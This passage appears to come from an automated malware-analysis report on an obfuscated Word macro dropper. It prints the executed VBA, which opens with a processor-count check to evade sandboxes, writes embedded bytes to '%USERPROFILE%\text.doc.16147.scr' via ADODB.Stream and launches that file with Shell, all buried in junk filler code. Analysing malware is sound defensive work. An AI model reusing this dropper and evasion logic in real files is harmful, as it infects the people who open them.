388 | Q2Q4P = (823 - 402) + 5
389 | Dim E03Yb(20 To 27) as Long
390 | E03Yb(20) = (- 275 + 970) + 27
391 | Dim A1P3f(11 To 100) as String
392 | A1P3f(11) = OkaWA | OkaWA
393 | Dim UHd6q(1) as Byte
394 | UHd6q(1) = 183
395 | Dim XDTN8(28 To 36) as String
396 | XDTN8(28) = JrPYW | JrPYW
397 | Dim PueOR as Byte
398 | PueOR = 176
399 | Dim E52jB(31 To 232) as String
400 | E52jB(31) = F6kH3 | F6kH3
401 | Dim PR1Kt as Long
402 | PR1Kt = (667 - 260) - 22
403 | Dim McG7w as Byte
404 | Dim IuY2U(25) as Byte
405 | IuY2U(25) = 90
406 | Dim A8XHS(9 To 62) as String
407 | A8XHS(9) = Hf7hK | Hf7hK
408 | Dim D5NeH as Long
409 | D5NeH = (- 480 / 928) + 8
410 | Dim Z0C28 as Byte
411 | Z0C28 = 121
412 | Dim DzJf7 as Long
413 | DzJf7 = (215 + 99) / 4
414 | Dim IM6UA(2 To 268) as Long
415 | IM6UA(2) = (- 397 / 517) / 17
416 | Dim TJ2Ep as String
417 | TJ2Ep = "OvD2n"
418 | Dim SJnW2 as String
419 | SJnW2 = "BNFSv"
420 | Dim HEffn(95) as Byte
421 | HEffn(95) = 174
422 | Dim Tv8vb as Byte
423 | Dim JQNt7 as Long
424 | JQNt7 = (147 / 453) + 27
425 | Dim K3GL0(23 To 255) as Long
426 | K3GL0(23) = (887 - 65) + 43
427 | Dim CL270(33 To 308) as String
428 | CL270(33) = "OJ4L1"
429 | Dim WL7v3(1 To 73) as Long
430 | WL7v3(1) = (209 - 283) - 16
431 | Dim Q5AZ7(9 To 473) as Long
432 | Q5AZ7(9) = (- 166 / 532) + 41
433 | Dim CE6wW as String
434 | CE6wW = "Vs33Z"
435 | Dim DPxT7 as Byte
436 | Dim DSDr0(49) as Byte
437 | DSDr0(49) = 191
438 | Dim Q0MEh(55) as Byte
439 | Q0MEh(55) = 82
440 | Dim Qe281(74) as Byte
441 | Qe281(74) = 74
442 | Dim Ayi03 as Byte
443 | Dim SLS3C as Long
444 | SLS3C = (977 - 967) / 7
445 | Dim C4pL6(0 To 1) as String
446 | C4pL6(0) = "JqSOJ"
447 | End Sub

                    APIs | Meta Information

                    DQRn4

                    ZQ451

                    ME4k5

                    VAhvE

                    MeKE6

                    Mav4d

                    Iz1S7

                    ZQ3QJ

                    Shell

                    Shell("C:\Users\luketaylor\text.doc.16147.scr") -> 3300

                    Igu02

                    Strings | Decrypted Strings
                    "LYC2N"
                    "BqdZA"
                    "C4dm6"
                    "Ig7uA"
                    "PRe2L"
                    Line | Instruction | Meta Information
                    448

                    Public Sub sh1(KAJuJ)

                    449

                    Dim STI26 as Byte

                    executed
                    450

                    Dim A0xHM(26 To 369) as String

                    451

                    A0xHM(26) = DQRn4

                    DQRn4

                    452

                    Dim Q1sr5 as String

                    453

                    Q1sr5 = ZQ451

                    ZQ451

                    454

                    Dim Y3smw(20 To 313) as Long

                    455

                    Y3smw(20) = (138 + 109) - 48

                    456

                    Dim I3yT0 as String

                    457

                    I3yT0 = ME4k5

                    ME4k5

                    458

                    Dim LjSQB as String

                    459

                    LjSQB = VAhvE

                    VAhvE

                    460

                    Dim A4zLH as Byte

                    461

                    A4zLH = 0

                    462

                    Dim TsQ3h as Byte

                    463

                    Dim CoanH as Byte

                    464

                    CoanH = 221

                    465

                    Dim I1V6d as Long

                    466

                    I1V6d = (137 / 362) - 19

                    467

                    Dim L07b0(3 To 329) as Long

                    468

                    L07b0(3) = (- 288 - 699) / 32

                    469

                    Dim LHC85 as String

                    470

                    LHC85 = "LYC2N"

                    471

                    Dim VQDRI as String

                    472

                    VQDRI = MeKE6

                    MeKE6

                    473

                    Dim T5PPC as Byte

                    474

                    Dim U2B0a(9 To 186) as Long

                    475

                    U2B0a(9) = (- 955 + 123) - 14

                    476

                    Dim XCgdc as Byte

                    477

                    Dim Zt0dT as Byte

                    478

                    Dim PLg3l(48) as Byte

                    479

                    PLg3l(48) = 13

                    480

                    Dim RpE5C as Byte

                    481

                    Dim WmXR7 as String

                    482

                    WmXR7 = Mav4d

                    Mav4d

                    483

                    Dim JCCHw as String

                    484

                    JCCHw = "BqdZA"

                    485

                    Dim I78AF as Byte

                    486

                    Dim LE5S0(84) as Byte

                    487

                    LE5S0(84) = 227

                    488

                    Dim YNSD0 as String

                    489

                    YNSD0 = "C4dm6"

                    490

                    Dim BRt8w(14 To 447) as Long

                    491

                    BRt8w(14) = (- 410 - 969) - 47

                    492

                    Dim J6FpP(96) as Byte

                    493

                    J6FpP(96) = 30

                    494

                    Dim KjvOJ(98) as Byte

                    495

                    KjvOJ(98) = 143

                    496

                    Dim XbFDT(12) as Byte

                    497

                    XbFDT(12) = 91

                    498

                    Dim PJUqj as Byte

                    499

                    Dim G3Gzt(5 To 45) as Long

                    500

                    G3Gzt(5) = (728 / 168) + 5

                    501

                    Dim DB0b8(2 To 141) as Long

                    502

                    DB0b8(2) = (- 96 + 875) + 49

                    503

                    Dim Rq3H3 as Long

                    504

                    Rq3H3 = (- 705 - 628) - 47

                    505

                    Dim Ew4iZ as Long

                    506

                    Ew4iZ = (789 - 851) + 44

                    507

                    Dim MUF8J(97) as Byte

                    508

                    MUF8J(97) = 164

                    509

                    Dim Y3uBE(23 To 476) as Long

                    510

                    Y3uBE(23) = (- 145 + 749) / 8

                    511

                    Dim Mz6eO as Long

                    512

                    Mz6eO = (859 / 602) + 7

                    513

                    Dim G35S1 as Byte

                    514

                    Dim O2gTH(0) as Byte

                    515

                    O2gTH(0) = 148

                    516

                    Dim D4H7v as Byte

                    517

                    D4H7v = 80

                    518

                    Dim S0lpP as String

                    519

                    S0lpP = Iz1S7

                    Iz1S7

                    520

                    Dim J886S as Byte

                    521

                    Dim GB7LY as Long

                    522

                    GB7LY = (237 + 801) - 27

                    523

                    Dim PkcLo as String

                    524

                    PkcLo = ZQ3QJ

                    ZQ3QJ

                    525

                    Dim K0633 as Byte

                    526

                    Dim J5j4c(7 To 91) as String

                    527

                    J5j4c(7) = "Ig7uA"

                    528

                    Dim HdY8v as Long

                    529

                    HdY8v = (154 - 193) - 20

                    530

                    Dim J61Ot as Byte

                    531

                    Dim J2HgG(30 To 488) as String

                    532

                    J2HgG(30) = "PRe2L"

                    533

                    Dim NRd6k as Long

                    534

                    NRd6k = (294 / 34) + 48

                    535

                    Shell KAJuJ

                    Shell("C:\Users\luketaylor\text.doc.16147.scr") -> 3300

                    executed
                    536

                    Dim WE8cz(1 To 363) as Long

                    537

                    WE8cz(1) = (545 + 700) / 25

                    538

                    Dim Lptm3 as Byte

                    539

                    Lptm3 = 26

                    540

                    Dim Eb7fK as String

                    541

                    Eb7fK = Igu02

                    Igu02

                    542

                    Dim ZA7Yw(16 To 306) as Long

                    543

                    ZA7Yw(16) = (- 27 + 139) - 18

                    544

                    End Sub

                    Module: Module1

                    Declaration
                    Line | Content
                    1

                    Attribute VB_Name = "Module1"

                    Module: ThisDocument

                    Declaration
                    Line | Content
                    1

                    Attribute VB_Name = "ThisDocument"

                    2

                    Attribute VB_Base = "1Normal.ThisDocument"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = True

                    8

                    Attribute VB_Customizable = True

                    Executed Functions
                    APIs | Meta Information

                    T8F4v

                    K5D8g

                    Ul5qZ

                    S28K3

                    Environ

                    Environ("NUMBER_OF_PROCESSORS") -> 4

                    O84BAz6

                    J41vmf7

                    We8mB50

                    Vx1bX0T

                    KL0RGx1

                    Xa3i2R0

                    Zy6VpOn

                    BJ05P

                    P42zB

                    Q27gI

                    Part of subcall function x@J04Xt: Ik728

                    Part of subcall function x@J04Xt: A014z

                    Part of subcall function x@J04Xt: UrERz

                    Part of subcall function x@J04Xt: YcIPR

                    Part of subcall function x@J04Xt: MRbO5

                    Part of subcall function x@J04Xt: CStr

                    Part of subcall function x@J04Xt: NIuZE

                    Part of subcall function x@J04Xt: EP2DB

                    Part of subcall function x@J04Xt: ZvDa2

                    Part of subcall function x@J04Xt: G0d64

                    Part of subcall function x@J04Xt: W362Y

                    Part of subcall function x@J04Xt: GjaAA

                    CStr

                    Environ

                    Environ("USERPROFILE") -> C:\Users\luketaylor
                    Strings | Decrypted Strings
                    "NUMB""E"
                    "Z265E"
                    "WE3yt"
                    "USERPROFILE"
                    Line | Instruction | Meta Information
                    652

                    Sub Document_Open()

                    653

                    Dim UlBiv as String

                    executed
                    654

                    UlBiv = T8F4v

                    T8F4v

                    655

                    Dim MQ7hW(29 To 194) as String

                    656

                    MQ7hW(29) = K5D8g

                    K5D8g

                    657

                    Dim QPyeV as String

                    658

                    QPyeV = Ul5qZ

                    Ul5qZ

                    659

                    Dim F63XK as String

                    660

                    F63XK = S28K3

                    S28K3

                    661

                    Dim Fy83h(26 To 265) as Long

                    662

                    Fy83h(26) = (- 385 - 366) - 24

                    663

                    Dim C7kr8 as Long

                    664

                    C7kr8 = (12 - 60) + 6

                    665

                    On Error Resume Next

                    666

                    If Environ("NUMB" + "E" + O84BAz6 + J41vmf7 + We8mB50 + "R_O" + Vx1bX0T + "F" + KL0RGx1 + "_PR" + Xa3i2R0 + "OCE" + Zy6VpOn + "SSORS") < 2 Then

                    Environ("NUMBER_OF_PROCESSORS") -> 4

                    O84BAz6

                    J41vmf7

                    We8mB50

                    Vx1bX0T

                    KL0RGx1

                    Xa3i2R0

                    Zy6VpOn

                    executed
                    666

                    Goto B0476

                    666

                    Endif

                    667

                    Dim D6q0Q(25 To 133) as Long

                    668

                    D6q0Q(25) = (- 956 / 332) + 41

                    669

                    Dim JJzIB as Long

                    670

                    JJzIB = (- 213 + 168) / 38

                    671

                    Dim OMLpT as Long

                    672

                    OMLpT = (574 / 575) / 44

                    673

                    Dim KRfkL as String

                    674

                    KRfkL = "Z265E"

                    675

                    Dim W8NN6 as String

                    676

                    W8NN6 = BJ05P

                    BJ05P

                    677

                    Dim ZOC5l as Long

                    678

                    ZOC5l = (- 453 + 969) / 17

                    679

                    Dim VIfVd(23 To 219) as String

                    680

                    VIfVd(23) = P42zB

                    P42zB

                    681

                    Dim JinL2 as Byte

                    682

                    Dim G2c48 as String

                    683

                    G2c48 = "WE3yt"

                    684

                    Dim VZLVx as Byte

                    685

                    VZLVx = 165

                    686

                    Dim M17C2(25 To 322) as String

                    687

                    M17C2(25) = Q27gI

                    Q27gI

                    688

                    Dim FPN8c as Long

                    689

                    FPN8c = (236 / 794) - 26

                    690

                    x CStr(Environ("USERPROFILE")) & "\text.doc" & "." & "16147.scr"

                    CStr

                    Environ("USERPROFILE") -> C:\Users\luketaylor

                    executed
                    691

                    Dim Xw24M as Byte

                    692

                    Xw24M = 254

                    693

                    Dim PqAkQ as Byte

                    693

                    B0476:

                    695

                    End Sub

                    Non-Executed Functions
                    APIs | Meta Information

                    JiIyy

                    I70P3

                    HZibc

                    BcLv2

                    C0Vfq

                    BxYtT

                    OhAx1

                    NzkP8

                    Eg1q6

                    F2gVH

                    LKbGd

                    G1jcm

                    GE8D2

                    CySUV

                    W8fJH

                    D18NP

                    RzEI8

                    FG8Ql

                    Us6o1

                    Z2VyP

                    CFq3n

                    UDtTh

                    D6zNx

                    NGKGP

                    Y2Jti

                    GLr0d

                    MvykX

                    JS08j

                    N6b2y

                    Ace62

                    A7h7X

                    US5tA

                    R0be7

                    UBound

                    UBound

                    A7fA2

                    Pt7t4

                    O5Fw8

                    K83vS

                    Nzfy5

                    XBsOm

                    LBzBN

                    Bpcx3

                    B2864

                    B3Q2l

                    A35Ls

                    N578T

                    Open

                    U3038

                    Y0SFj

                    EqDjd

                    J6Xnm

                    Gn0p5

                    X6RIx

                    TyTNz

                    Strings | Decrypted Strings
                    "RNvYF"
                    "Dv1Sx"
                    "YH3V8"
                    "VW6JF"
                    "Qh343"
                    "HOqcN"
                    "MFxd6"
                    "FXzug"
                    "RVvYR"
                    "DyjxX"
                    "MaI72"
                    "D1cCH"
                    "SvjJX"
                    "Oj3p5"
                    "F0B2X"
                    "U5H2Z"
                    "GN253"
                    "UE1iu"
                    "IqK88"
                    "HfFAf"
                    "MiHQ1"
                    "In832"
                    "RUtlW"
                    "SxTq1"
                    "KQaR1"
                    "S1B2c"
                    "EQoob"
                    "HIdCG"
                    "N7HO2"
                    "Jg4kN"
                    "Um027"
                    "IAqLs"
                    "JhH55"
                    "J052Y"
                    "VAZ1L"
                    "OSb7k"
                    "MJId0"
                    "FPLi6"
                    "DX0mh"
                    "U0xEV"
                    "S6WCJ"
                    "R21L5"
                    "PGn02"
                    "V20A1"
                    "CtDSH"
                    "Qgym7"
                    "Gt7oe"
                    Line | Instruction | Meta Information
                    9

                    Public Sub test1(SG07j, B78Bz)

                    10

                    Dim Z6Vtd(2 To 270) as Long

                    11

                    Z6Vtd(2) = (- 921 / 17) + 27

                    12

                    Dim XxCry(21 To 252) as String

                    13

                    XxCry(21) = "RNvYF"

                    14

                    Dim L16Ns as Long

                    15

                    L16Ns = (513 / 647) / 21

                    16

                    Dim T3o6C(29 To 50) as String

                    17

                    T3o6C(29) = JiIyy

                    JiIyy

                    18

                    Dim WPY5a as String

                    19

                    WPY5a = I70P3

                    I70P3

                    20

                    Dim T6DRG(68) as Byte

                    21

                    T6DRG(68) = 167

                    22

                    Dim FY4tj as String

                    23

                    FY4tj = "Dv1Sx"

                    24

                    Dim JySvd(5 To 441) as Long

                    25

                    JySvd(5) = (622 - 749) / 16

                    26

                    Dim HVgMV(40) as Byte

                    27

                    HVgMV(40) = 173

                    28

                    Dim Dlv68(15 To 195) as String

                    29

                    Dlv68(15) = "YH3V8"

                    30

                    Dim NAnEu as Long

                    31

                    NAnEu = (928 + 537) - 5

                    32

                    Dim Uq8X3 as Byte

                    33

                    Uq8X3 = 213

                    34

                    Dim AH5LQ(15 To 88) as String

                    35

                    AH5LQ(15) = HZibc

                    HZibc

                    36

                    Dim Hj50H(11 To 422) as Long

                    37

                    Hj50H(11) = (- 40 / 551) - 42

                    38

                    Dim MYcw1(20 To 237) as String

                    39

                    MYcw1(20) = BcLv2

                    BcLv2

                    40

                    Dim BP33O(3 To 416) as String

                    41

                    BP33O(3) = "VW6JF"

                    42

                    Dim N18dI as Byte

                    43

                    N18dI = 106

                    44

                    Dim YrDH8 as Long

                    45

                    YrDH8 = (- 855 + 784) + 44

                    46

                    Dim OQhFY as Byte

                    47

                    Dim BO00p as String

                    48

                    BO00p = "Qh343"

                    49

                    Dim WDJUU(6 To 221) as String

                    50

                    WDJUU(6) = "HOqcN"

                    51

                    Dim KG8wK(34 To 115) as String

                    52

                    KG8wK(34) = "MFxd6"

                    53

                    Dim ZIGAQ as Long

                    54

                    ZIGAQ = (- 962 / 370) - 2

                    55

                    Dim YfY6A as String

                    56

                    YfY6A = "FXzug"

                    57

                    Dim I265X as Long

                    58

                    I265X = (- 478 - 33) - 23

                    59

                    Dim J0G42 as String

                    60

                    J0G42 = C0Vfq

                    C0Vfq

                    61

                    Dim O15AO as String

                    62

                    O15AO = BxYtT

                    BxYtT

                    63

                    Dim F5Yo4 as Byte

                    64

                    Dim DKNai as String

                    65

                    DKNai = OhAx1

                    OhAx1

                    66

                    Dim SJAPn as Long

                    67

                    SJAPn = (830 + 762) / 20

                    68

                    Dim ZU5MU(27) as Byte

                    69

                    ZU5MU(27) = 233

                    70

                    Dim Dvhoi as Long

                    71

                    Dvhoi = (576 - 590) / 15

                    72

                    Dim Iu0ef(10 To 101) as String

                    73

                    Iu0ef(10) = NzkP8

                    NzkP8

                    74

                    Dim Ayt2P as String

                    75

                    Ayt2P = "RVvYR"

                    76

                    Dim HNP0B(30 To 296) as Long

                    77

                    HNP0B(30) = (432 / 20) + 14

                    78

                    Dim DGhXX(9 To 17) as Long

                    79

                    DGhXX(9) = (644 + 448) + 14

                    80

                    Dim Ghtv5 as Long

                    81

                    Ghtv5 = (- 356 - 236) / 34

                    82

                    Dim EZgIt(14 To 475) as String

                    83

                    EZgIt(14) = Eg1q6

                    Eg1q6

                    84

                    Dim K17RU(9 To 380) as Long

                    85

                    K17RU(9) = (- 316 / 906) + 7

                    86

                    Dim B205R as String

                    87

                    B205R = F2gVH

                    F2gVH

                    88

                    Dim XM7np(29 To 194) as String

                    89

                    XM7np(29) = LKbGd

                    LKbGd

                    90

                    Dim JEh0y(0 To 1) as String

                    91

                    JEh0y(0) = G1jcm

                    G1jcm

                    92

                    Dim J5wcd as String

                    93

                    J5wcd = "DyjxX"

                    94

                    Dim NcEED(16 To 206) as Long

                    95

                    NcEED(16) = (724 - 146) + 40

                    96

                    Dim PddFF(76) as Byte

                    97

                    PddFF(76) = 185

                    98

                    Dim Z7v0Q as String

                    99

                    Z7v0Q = GE8D2

                    GE8D2

                    100

                    Dim PG21j as String

                    101

                    PG21j = CySUV

                    CySUV

                    102

                    Dim ZLXC1 as Byte

                    103

                    Dim T0G6r(7 To 356) as String

                    104

                    T0G6r(7) = "MaI72"

                    105

                    Dim CF1sh(88) as Byte

                    106

                    CF1sh(88) = 12

                    107

                    Dim M4BLO(4 To 28) as Long

                    108

                    M4BLO(4) = (359 - 415) + 44

                    109

                    Dim Fw3vH as Long

                    110

                    Fw3vH = (247 + 589) + 41

                    111

                    Dim RTkJ0() as Byte

                    112

                    Dim It8ni as Long

                    113

                    It8ni = (- 302 + 50) / 39

                    114

                    Dim GM1v5 as Long

                    115

                    GM1v5 = (972 + 796) - 26

                    116

                    Dim CEWgw(28 To 303) as String

                    117

                    CEWgw(28) = "D1cCH"

                    118

                    Dim Pvtdr as String

                    119

                    Pvtdr = W8fJH

                    W8fJH

                    120

                    Dim DE05S as String

                    121

                    DE05S = "SvjJX"

                    122

                    Dim DypKj(11 To 126) as Long

                    123

                    DypKj(11) = (- 480 + 784) / 22

                    124

                    Dim A0ylA as Byte

                    125

                    Dim LH7Q1 as Long

                    126

                    LH7Q1 = (- 724 - 128) - 11

                    127

                    Dim V7YP1 as Byte

                    128

                    Dim Gb6x8 as Long

                    129

                    Gb6x8 = (297 - 57) - 10

                    130

                    Dim AzPD7(49) as Byte

                    131

                    AzPD7(49) = 60

                    132

                    Dim A8MDS(2 To 139) as Long

                    133

                    A8MDS(2) = (659 - 324) + 15

                    134

                    Dim T4MG4 as String

                    135

                    T4MG4 = D18NP

                    D18NP

                    136

                    Dim TFsn8(62) as Byte

                    137

                    TFsn8(62) = 76

                    138

                    Dim IVYW5(30 To 85) as String

                    139

                    IVYW5(30) = RzEI8

                    RzEI8

                    140

                    Dim NJWek as String

                    141

                    NJWek = "Oj3p5"

                    142

                    Dim UfYzs(55) as Byte

                    143

                    UfYzs(55) = 132

                    144

                    Dim MwE07(7) as Byte

                    145

                    MwE07(7) = 201

                    146

                    Dim Nr0bV as Byte

                    147

                    Dim CkcpF(99) as Byte

                    148

                    CkcpF(99) = 239

                    149

                    Dim EZ3r3(32 To 170) as Long

                    150

                    EZ3r3(32) = (162 + 950) + 25

                    151

                    Dim T1GVo as Byte

                    152

                    T1GVo = 151

                    153

                    Dim T0ZTv as Byte

                    154

                    T0ZTv = 91

                    155

                    Dim AfOpe as Long

                    156

                    AfOpe = (373 - 274) + 37

                    157

                    Dim ZPG4y(30 To 450) as String

                    158

                    ZPG4y(30) = FG8Ql

                    FG8Ql

                    159

                    Dim Q8mqW as Byte

                    160

                    Dim Mlh44(28 To 169) as String

                    161

                    Mlh44(28) = "F0B2X"

                    162

                    Dim Sijqv as Byte

                    163

                    Sijqv = 170

                    164

                    Dim HS2f0(51) as Byte

                    165

                    HS2f0(51) = 238

                    166

                    Dim W8rbm as Byte

                    167

                    Dim XmCnj as String

                    168

                    XmCnj = Us6o1

                    Us6o1

                    169

                    Dim Sq28v as Byte

                    170

                    Sq28v = 89

                    171

                    Dim BnmDS as Long

                    172

                    BnmDS = (- 28 + 623) - 35

                    173

                    Dim EiyW4(25) as Byte

                    174

                    EiyW4(25) = 230

                    175

                    Dim UraR5(40) as Byte

                    176

                    UraR5(40) = 99

                    177

                    Dim PUR0v as Byte

                    178

                    Dim X0m11(20 To 78) as String

                    179

                    X0m11(20) = "U5H2Z"

                    180

                    With CreateObject("adodb.stream")

                    181

                    Dim BHzgp as Long

                    182

                    BHzgp = (774 - 578) - 37

                    183

                    Dim TXkcs(5 To 70) as Long

                    184

                    TXkcs(5) = (439 - 488) / 37

                    185

                    Dim QHGsD as Byte

                    186

                    Dim BX28o(98) as Byte

                    187

                    BX28o(98) = 72

                    188

                    Dim W8xkN as Byte

                    189

                    W8xkN = 5

                    190

                    Dim TxHCo as Byte

                    191

                    TxHCo = 151

                    192

                    Dim ENEpV(15 To 281) as Long

                    193

                    ENEpV(15) = (- 211 / 473) + 40

                    194

                    Dim A06q8 as String

                    195

                    A06q8 = "GN253"

                    196

                    Dim S248R as String

197 | S248R = Z2VyP | Z2VyP
198 | Dim LsvZ7(18 To 331) as Long
199 | LsvZ7(18) = (558 / 278) - 28
200 | Dim G27FB(1 To 443) as Long
201 | G27FB(1) = (- 543 - 254) / 41
202 | Dim Eug66(86) as Byte
203 | Eug66(86) = 229
204 | Dim Vb22q(90) as Byte
205 | Vb22q(90) = 183
206 | Dim XoaL7(14 To 275) as Long
207 | XoaL7(14) = (159 - 453) + 33
208 | Dim H1zFm(2 To 239) as String
209 | H1zFm(2) = "UE1iu"
210 | Dim Fg4l1(4 To 148) as String
211 | Fg4l1(4) = "IqK88"
212 | Dim GAF6F(28 To 166) as Long
213 | GAF6F(28) = (- 521 - 694) - 18
214 | Dim Won7L(90) as Byte
215 | Won7L(90) = 92
216 | Dim KotsD(14 To 90) as Long
217 | KotsD(14) = (- 782 - 398) - 23
218 | Dim Vdxb1(23 To 24) as Long
219 | Vdxb1(23) = (590 / 885) + 41
220 | Dim KTlJi(3 To 377) as Long
221 | KTlJi(3) = (- 423 / 911) - 17
222 | Dim B4lhk as String
223 | B4lhk = CFq3n | CFq3n
224 | . Type = 1
225 | Dim D63dd as Long
226 | D63dd = (973 + 343) + 33
227 | Dim FDF4N as Byte
228 | FDF4N = 16
229 | Dim Y1Nl5(27 To 423) as String
230 | Y1Nl5(27) = UDtTh | UDtTh
231 | Dim Cs0R0(19 To 124) as String
232 | Cs0R0(19) = "HfFAf"
233 | Dim X1p7U as Long
234 | X1p7U = (950 / 873) / 47
235 | Dim R2c6v as String
236 | R2c6v = D6zNx | D6zNx
237 | Dim B34TO as Long
238 | B34TO = (- 161 / 416) + 5
239 | Dim TTFj2 as String
240 | TTFj2 = NGKGP | NGKGP
241 | Dim Nu4T2(0 To 1) as Long
242 | Nu4T2(0) = (825 / 270) - 15
243 | . Open
244 | Dim DsPYr(58) as Byte
245 | DsPYr(58) = 144
246 | Dim Y4seF as String
247 | Y4seF = "MiHQ1"
248 | Dim LC6S4(10) as Byte
249 | LC6S4(10) = 140
250 | Dim T1aQ4 as Long
251 | T1aQ4 = (- 451 - 427) + 12
252 | Dim IOEQ4 as Byte
253 | Dim OuZ8q as String
254 | OuZ8q = Y2Jti | Y2Jti
255 | Dim X281p(17 To 232) as Long
256 | X281p(17) = (362 - 693) - 42
257 | Dim R0y38 as Long
258 | R0y38 = (- 428 / 908) + 11
259 | Dim JlHnA(9 To 346) as Long
260 | JlHnA(9) = (408 - 939) - 28
261 | Dim D73Ej as Byte
262 | Dim DVx10(6 To 28) as Long
263 | DVx10(6) = (287 / 732) / 9
264 | Dim Sd4C8 as Byte
265 | Dim T2nwq as Byte
266 | Dim FACoO(4 To 335) as Long
267 | FACoO(4) = (- 383 + 419) / 20
268 | Dim Lf858 as String
269 | Lf858 = GLr0d | GLr0d
270 | Dim OTSOx(4 To 464) as String
271 | OTSOx(4) = "In832"
272 | Dim GOewz(51) as Byte
273 | GOewz(51) = 54
274 | Dim PmB80(24) as Byte
275 | PmB80(24) = 7
276 | Dim Nm7yu as String
277 | Nm7yu = "RUtlW"
278 | Dim JP35x as String
279 | JP35x = MvykX | MvykX
280 | Dim M78t5(39) as Byte
281 | M78t5(39) = 64
282 | Dim Jqn4z(82) as Byte
283 | Jqn4z(82) = 229
284 | Dim HT1BL as Long
285 | HT1BL = (956 / 463) + 39
286 | Dim Sh6B5 as Long
287 | Sh6B5 = (963 + 998) - 44
288 | Dim ZVW1Y(65) as Byte
289 | ZVW1Y(65) = 243
290 | . Write SG07j
291 | Dim UA6uq as String
292 | UA6uq = "SxTq1"
293 | Dim RXnfC(22 To 447) as Long
294 | RXnfC(22) = (108 / 292) + 19
295 | Dim HM2qo as Byte
296 | Dim DR87R as String
297 | DR87R = JS08j | JS08j
298 | Dim JiK8G(91) as Byte
299 | JiK8G(91) = 209
300 | Dim Bd8PI(31) as Byte
301 | Bd8PI(31) = 5
302 | Dim KS30R(99) as Byte
303 | KS30R(99) = 70
304 | Dim J5Olx as String
305 | J5Olx = N6b2y | N6b2y
306 | Dim R4238(25 To 187) as Long
307 | R4238(25) = (- 908 - 590) + 11
308 | Dim Wa1rO as Byte
309 | Wa1rO = 202
310 | Dim JOHVE as Byte
311 | JOHVE = 41
312 | Dim ICvSv as String
313 | ICvSv = Ace62 | Ace62
314 | Dim H0EKF(14 To 21) as String
315 | H0EKF(14) = "KQaR1"
316 | Dim EQbHq(27 To 288) as String
317 | EQbHq(27) = "S1B2c"
318 | Dim T5AC3(4 To 269) as String
319 | T5AC3(4) = "EQoob"
320 | Dim Hdkk7(25 To 393) as Long
321 | Hdkk7(25) = (- 873 / 710) + 16
322 | Dim JPIU3(62) as Byte
323 | JPIU3(62) = 29
324 | Dim LKlOJ as String
325 | LKlOJ = "HIdCG"
326 | Dim Lxa6P(23 To 97) as String
327 | Lxa6P(23) = "N7HO2"
328 | Dim N7ds4 as Long
329 | N7ds4 = (14 + 884) + 23
330 | Dim J70a6(10 To 442) as String
331 | J70a6(10) = "Jg4kN"
332 | Dim VWgRj as String
333 | VWgRj = "Um027"
334 | Dim V0VyL as Byte
335 | Dim O6DJP as Byte
336 | Dim P0B8n as Byte
337 | Dim NZm7o as String
338 | NZm7o = A7h7X | A7h7X
339 | Dim Wx1mB(28 To 46) as String
340 | Wx1mB(28) = "IAqLs"
341 | Nr0bV = 140
342 | Dim W6cBD as Byte
343 | Dim IE28H as Byte
344 | Dim Ke3TM(44) as Byte
345 | Ke3TM(44) = 34
346 | Dim IIbp2 as Byte
347 | Dim NS8bc(0) as Byte
348 | NS8bc(0) = 29
349 | Dim KjY57(16 To 90) as String
350 | KjY57(16) = US5tA | US5tA
351 | Dim E2fXs(8 To 68) as Long
352 | E2fXs(8) = (54 / 242) - 45
353 | Dim Dbq3a(0 To 1) as String
354 | Dbq3a(0) = R0be7 | R0be7
355 | Dim Cdn4b(8 To 279) as Long
356 | Cdn4b(8) = (- 1 / 232) - 21
357 | Dim YHk1I as Byte
358 | Dim D3AZC(8 To 375) as String
359 | D3AZC(8) = "JhH55"
360 | Dim EyMnI as Byte
361 | EyMnI = 117
362 | Dim Bmb52(77) as Byte
363 | Bmb52(77) = 101
364 | Dim X3bT0(25 To 125) as Long
365 | X3bT0(25) = (151 - 755) - 34
366 | Dim T5XW8 as Byte
367 | T5XW8 = 9
368 | Dim AjSXV as Byte
369 | Redim RTkJ0(UBound(SG07j) + Nr0bV) | UBound
370 | FWyLu = 62792
371 | For Yc8Rn = 62792 To UBound(SG07j) | UBound
372 | Ytg1B = A7fA2 | A7fA2
373 | GBdyo = Pt7t4 | Pt7t4
374 | M5omZ = O5Fw8 | O5Fw8
375 | G48Yg = 132
376 | L733s = K83vS | K83vS
377 | X0O3e = Nzfy5 | Nzfy5
378 | RTkJ0(Yc8Rn - 62792) = SG07j(Yc8Rn)
379 | MG03r = XBsOm | XBsOm
380 | NoDON = LBzBN | LBzBN
381 | Next | UBound
382 | Dim ZOoi3 as String
383 | ZOoi3 = Bpcx3 | Bpcx3
384 | Dim Oq4O7(4 To 280) as Long
385 | Oq4O7(4) = (550 - 414) / 24
386 | Dim M5r4q as Long
387 | M5r4q = (- 841 - 58) / 9
388 | Dim PqC3P as String
389 | PqC3P = "J052Y"
390 | Dim XHDa8 as Long
391 | XHDa8 = (- 935 + 672) - 34
392 | Dim Btv4s(38) as Byte
393 | Btv4s(38) = 22
394 | Dim R2ek8(29 To 88) as String
395 | R2ek8(29) = B2864 | B2864
396 | Dim OZmq5 as Long
397 | OZmq5 = (498 - 852) + 25
398 | Dim S8G87(59) as Byte
399 | S8G87(59) = 254
400 | Dim GwL48 as String
401 | GwL48 = "VAZ1L"
402 | Dim Ibh16 as Long
403 | Ibh16 = (617 + 665) - 40
404 | RTkJ0(G48Yg) = Nr0bV
405 | Dim S02ZX as Long
406 | S02ZX = (- 788 / 872) - 39
407 | Dim S0omk as Byte
408 | Dim X6nj0(26) as Byte
409 | X6nj0(26) = 240
410 | Dim K7BVf as Byte
411 | K7BVf = 232
412 | Dim HqBS3 as Byte
413 | HqBS3 = 250
414 | Dim BnoOq(4 To 241) as Long
415 | BnoOq(4) = (675 - 7) + 35
416 | Dim T43CU as String
417 | T43CU = B3Q2l | B3Q2l
418 | Dim M13Eo as Byte
419 | M13Eo = 159
420 | Dim L5af6 as String
421 | L5af6 = "OSb7k"
422 | Dim PXqeM(16) as Byte
423 | PXqeM(16) = 100
424 | Dim Ii745 as String
425 | Ii745 = A35Ls | A35Ls
426 | Dim ZmoPt as Byte
427 | Dim JpmGb(10 To 74) as String
428 | JpmGb(10) = "MJId0"
429 | Dim YkN4C(9 To 421) as Long
430 | YkN4C(9) = (800 - 56) + 7
431 | Dim K58bD(18 To 66) as Long
432 | K58bD(18) = (- 554 + 920) + 17
433 | Dim Qktd2 as Long
